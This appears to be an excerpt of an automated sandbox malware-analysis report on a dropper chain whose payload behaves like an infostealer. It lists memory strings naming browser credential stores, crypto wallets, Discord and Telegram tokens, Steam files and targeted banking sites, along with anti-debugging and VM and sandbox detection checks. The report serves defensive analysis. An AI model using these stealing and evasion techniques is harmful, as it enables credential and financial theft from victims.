Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: c2bea0d661.exe, 00000011.00000003.2161485786.0000000000B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 12.1e411cf62bcba04d74fc6b505b9235404INSERT_KEY_HEREGetProcALoadLibrlstrcatAOpenEvenCreateEvCloseHanVirtualAllocExNuVirtualFGetSysteVirtualAHeapAlloGetComputerNameAlstrcpyAGetProceGetCurrentProceslstrlenAExitProcSystemTimeToFileadvapi32gdi32.dluser32.dcrypt32.ntdll.dlGetUserNCreateDCGetDevicReleaseDVMwareVMJohnDoe%hu/%hu/GetEnvironmentVariableAGetFileAttributeGlobalLoHeapFreeGetFileSGlobalSiIsWow64PProcess3GetLocalFreeLibrGetTimeZoneInforGetSystemPowerStGetWindowsDirectGetModuleFileNamDeleteFiFindNextLocalFreFindClosSetEnvironmentVaLocalAllReadFileSetFilePWriteFilCreateFiFindFirsCopyFileVirtualPGetLastElstrcpynMultiByteToWideCGlobalFrWideCharToMultiBGlobalAlOpenProcTerminateProcessgdiplus.ole32.dlbcrypt.dwininet.shlwapi.shell32.psapi.dlrstrtmgrCreateCompatibleSelectObDeleteObGdiplusSGdiplusShutdownGdipSaveImageToSGdipDisposeImageGdipFreeGetHGlobalFromStCreateStreamOnHGCoUninitCoInitiaCoCreateInstanceBCryptDeBCryptSetPropertBCryptDestroyKeyGetWindoGetDesktopWindowCloseWinwsprintfEnumDisplayDevicGetKeyboardLayouCharToOeRegQueryValueExARegEnumKRegOpenKRegCloseRegEnumVCryptBinaryToStrSHGetFolderPathAShellExecuteExAInternetOpenUrlAInternetConnectAInternetCloseHanInternetHttpSendRequestAHttpOpenRequestAInternetReadFileInternetCrackUrlStrCmpCAStrStrAStrCmpCWPathMatcRmStartSRmRegisterResourRmGetLisRmEndSessqlite3_sqlite3_prepare_sqlite3_column_tsqlite3_finalizesqlite3_column_bencrypteNSS_InitNSS_ShutPK11_GetInternalKeySlotPK11_FrePK11_AuthenticatPK11SDR_DecryptC:\ProgramData\profile:Login: PasswordOperaGXNetworkCookiesAutofillHistoryMonth: Login DaWeb Datalogins.jformSubmusernameencryptedUsernamencryptedPassworcookies.places.sPluginsSync Extension SettingsIndexedDOpera StOpera GX StableCURRENTchrome-extension_0.indexeddb.levLocal StprofilesfirefoxWallets%08lX%04ProductN%d/%d/%d %d:%d:%DisplayNDisplayVfreebl3.mozglue.msvcp140nss3.dllsoftokn3vcruntime140.dll/c start%DESKTOP%APPDATA%LOCALAP%USERPRO%DOCUMEN%PROGRAM%PROGRAMFILES_86%RECENT%\discord\Local Storage\l\Telegram Desktokey_dataD877F783D5D3EF8CA7FDF864FBC10B77A92DAA6EA6F891F2F8806DD0C461824FTelegram\.purpleaccountsdQw4w9Wgtoken: Software\Valve\SSteamPat\config\config.vDialogConfig.vdflibraryfolders.vloginuse\Steam\sqlite3.browsers\Discord\tokens.HTTP/1.1file_nammessagescreensh
Source: chrome.exe, 00000019.00000002.2747791390.00006AE4006F8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: a629a70424.exe, 00000018.00000003.2849227403.0000000000E3A000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2809304370.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000002.2865129705.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWn
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: c2bea0d661.exe, 00000011.00000002.3453964027.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240869802.0000000001471000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000002.2257247637.0000000001471000.00000004.00000020.00020000.00000000.sdmp, 8f25543307.exe, 00000014.00000002.3185511636.0000000000D76000.00000004.00000020.00020000.00000000.sdmp, 8f25543307.exe, 00000014.00000002.3200765097.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2849227403.0000000000E3A000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2809304370.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000002.2865129705.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: c2bea0d661.exe, 00000011.00000002.3453964027.00000000008CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: firefox.exe, 0000002C.00000002.2773571869.0000020DBFCB9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: BlueMail.exe, 00000015.00000002.2299351941.0000000000725000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{5Zq
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: firefox.exe, 0000002C.00000002.2716114096.0000020DB5BA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: chrome.exe, 00000019.00000002.2518408474.000002184660D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: chrome.exe, 00000019.00000002.2808960005.00006AE400A8C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 6ce added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=06253c07-e756-444f-b126-ccd80e701933j
Source: c2bea0d661.exe, 00000011.00000002.3453964027.000000000085E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(=
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: vmwin.exe, 0000001D.00000002.2710996354.0000000003281000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: c2bea0d661.exe, 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: VMwareVMware
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: vmwin.exe, 0000001D.00000002.2710996354.0000000003281000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: c2bea0d661.exe, 00000011.00000002.3461733479.0000000003E3A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: od_VMware_SATA_C
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: file.exe, file.exe, 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, skotes.exe, 00000007.00000002.1349672555.000000000055D000.00000040.00000001.01000000.00000008.sdmp, 8f25543307.exe, 8f25543307.exe, 00000014.00000002.3183424876.00000000009A1000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: chrome.exe, 00000019.00000002.2815959871.00006AE401108000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware Virtual USB Mouse
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: c2bea0d661.exe, 00000011.00000002.3453964027.00000000008CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW/
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: c2bea0d661.exe	Binary or memory string: MwareVMware
Source: 75e257f622.exe, 0000001E.00000003.2561144386.0000000001813000.00000004.00000020.00020000.00000000.sdmp, 75e257f622.exe, 0000001E.00000003.2546129201.0000000001801000.00000004.00000020.00020000.00000000.sdmp, 75e257f622.exe, 0000001E.00000002.2592803609.000000000181A000.00000004.00000020.00020000.00000000.sdmp, 75e257f622.exe, 0000001E.00000003.2544387274.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, 75e257f622.exe, 0000001E.00000003.2560534668.0000000001802000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW)
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 3b636bd67f.exe, 00000013.00000002.2257128691.000000000143C000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240869802.000000000143C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: chrome.exe, 00000019.00000002.2808960005.00006AE400A8C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ce added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=06253c07-e756-444f-b126-ccd80e701933
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: wscript.exe, 0000001C.00000002.2410804973.000001EFF9DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: c2bea0d661.exe, 00000011.00000003.2161485786.0000000000B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMwareVM
Source: a629a70424.exe, 00000018.00000002.2862333493.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: chrome.exe, 00000019.00000002.2808960005.00006AE400A8C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=06253c07-e756-444f-b126-ccd80e701933j
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: file.exe, 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000007.00000002.1349672555.000000000055D000.00000040.00000001.01000000.00000008.sdmp, 8f25543307.exe, 00000014.00000002.3183424876.00000000009A1000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: chrome.exe, 00000019.00000002.2808960005.00006AE400A8C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=06253c07-e756-444f-b126-ccd80e701933
Source: c2bea0d661.exe, 00000011.00000002.3458667633.0000000003B99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	API call chain: ExitProcess graph end node	graph_17-14809
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	API call chain: ExitProcess graph end node	graph_17-15535
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	API call chain: ExitProcess graph end node	graph_17-15018

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_05010508 rdtsc

0_2_05010508

Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe

Code function: 19_2_0043B480 LdrInitializeThunk,

19_2_0043B480

Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe

Code function: 15_2_00B18077 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

15_2_00B18077

Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe

Code function: 20_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

20_2_00402A20

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

17_2_0081C858

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E3652B mov eax, dword ptr fs:[00000030h]	0_2_00E3652B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E3A302 mov eax, dword ptr fs:[00000030h]	0_2_00E3A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_0039A302 mov eax, dword ptr fs:[00000030h]	7_2_0039A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_0039652B mov eax, dword ptr fs:[00000030h]	7_2_0039652B
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 15_2_00B2E1A9 mov edi, dword ptr fs:[00000030h]	15_2_00B2E1A9
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 15_2_00B117D0 mov edi, dword ptr fs:[00000030h]	15_2_00B117D0
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_00401325 mov eax, dword ptr fs:[00000030h]	17_2_00401325
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_00401325 mov eax, dword ptr fs:[00000030h]	17_2_00401325
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_00401325 mov eax, dword ptr fs:[00000030h]	17_2_00401325
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_00401325 mov eax, dword ptr fs:[00000030h]	17_2_00401325
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_00401325 mov eax, dword ptr fs:[00000030h]	17_2_00401325
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_00401325 mov eax, dword ptr fs:[00000030h]	17_2_00401325
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_004012DC test dword ptr fs:[00000030h], 00000068h	17_2_004012DC
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_004012ED mov eax, dword ptr fs:[00000030h]	17_2_004012ED
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_004012BE mov eax, dword ptr fs:[00000030h]	17_2_004012BE
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_007848B7 push dword ptr fs:[00000030h]	17_2_007848B7
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0080158C mov eax, dword ptr fs:[00000030h]	17_2_0080158C
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0080158C mov eax, dword ptr fs:[00000030h]	17_2_0080158C
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0080158C mov eax, dword ptr fs:[00000030h]	17_2_0080158C
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0080158C mov eax, dword ptr fs:[00000030h]	17_2_0080158C
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0080158C mov eax, dword ptr fs:[00000030h]	17_2_0080158C
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0080158C mov eax, dword ptr fs:[00000030h]	17_2_0080158C
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_00800D90 mov eax, dword ptr fs:[00000030h]	17_2_00800D90
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_00801525 mov eax, dword ptr fs:[00000030h]	17_2_00801525
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0080092B mov eax, dword ptr fs:[00000030h]	17_2_0080092B
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_00801543 test dword ptr fs:[00000030h], 00000068h	17_2_00801543
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_00801554 mov eax, dword ptr fs:[00000030h]	17_2_00801554
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 18_2_00B117D0 mov edi, dword ptr fs:[00000030h]	18_2_00B117D0
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_10007A76 mov eax, dword ptr fs:[00000030h]	20_2_10007A76
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_10005F25 mov eax, dword ptr fs:[00000030h]	20_2_10005F25
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_00CBCE6B push dword ptr fs:[00000030h]	20_2_00CBCE6B
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_04B30D90 mov eax, dword ptr fs:[00000030h]	20_2_04B30D90
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_04B3092B mov eax, dword ptr fs:[00000030h]	20_2_04B3092B

Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe

Code function: 15_2_00B19E16 GetProcessHeap,

15_2_00B19E16

Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 15_2_00B18077 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_00B18077
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 15_2_00B139F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_00B139F1
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 15_2_00B139E5 SetUnhandledExceptionFilter,	15_2_00B139E5
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 15_2_00B12F82 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_00B12F82
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 18_2_00B18077 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_00B18077
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 18_2_00B139F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_00B139F1
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 18_2_00B139E5 SetUnhandledExceptionFilter,	18_2_00B139E5
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 18_2_00B12F82 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_00B12F82
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_004099EA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_004099EA
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_0040A54A
